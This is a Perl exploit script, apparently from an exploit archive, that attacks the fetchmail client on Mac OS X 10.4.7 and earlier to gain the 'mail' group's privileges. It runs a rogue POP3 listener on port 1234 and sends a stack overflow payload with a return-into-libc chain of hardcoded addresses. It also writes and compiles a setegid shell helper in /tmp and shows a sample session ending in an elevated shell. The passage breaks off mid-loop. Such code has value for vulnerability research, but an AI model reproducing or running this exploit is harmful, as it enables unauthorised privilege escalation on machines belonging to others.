Mac OS X <= 10.4.7 - fetchmail Privilege Escalation Exploit (x86)
#!/usr/bin/perl
# getpwnedmail.pl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# This is a canibalized version of "Kansas City POP Daemon Version 0.0" - Copyright (c) 1999 David Nicol <davidnicol@acm.org>
#
# kevin-finisterres-mac-mini:~ kfinisterre$ /usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234
# Enter password for kfinisterre@localhost:
# sh-2.05b$ id
# uid=501(kfinisterre) gid=501(kfinisterre) egid=6(mail) groups=6(mail), 81(appserveradm), 79(appserverusr), 80(admin)
#
# http://docs.info.apple.com/article.html?artnum=106704
use Socket;
use IO::Handle;
use IO::Socket;
$banner = " /tmp/sh ";
$cmd = $banner ;
$ebp = 0x41424344;
$system = 0x900474e0; # NX is a problem use return into libc
$setuid = 0x90033da0;
$cmdstr = 0xbfffd923; # (gdb) x/10s $esp+131 - 0xbfffd8e3: " /tmp/sh "
$malstr = "A" x 286 . pack('l', $ebp) . pack('l', $system) . pack('l', $setuid) . pack('l', $cmdstr) ;
open(SUSH,">/tmp/aaa.c");
printf SUSH "int main(){setegid(6);setgid(6);system(\"/bin/sh\");}\n";
system("PATH=$PATH:/usr/bin/ cc -o /tmp/sh /tmp/aaa.c");
$PortNumber = 1234;
$door = IO::Socket::INET->new( Proto=>'tcp', LocalPort=>$PortNumber, Listen=>SOMAXCONN, Reuse=>1 );
die "Cannot set up socket: $!" unless $door;
$timeout = 60;
$SIG{ALRM} = sub { die "alarm or timeout\n" };
print "open a new window and type - \"/usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234\"\n";
print "choose any password and press enter\n";
for(;;)
{
until( $client = $door->accept())
{
sleep 1;
};
$F = fork;
die "Fork weirdness: $!" if $F < 0;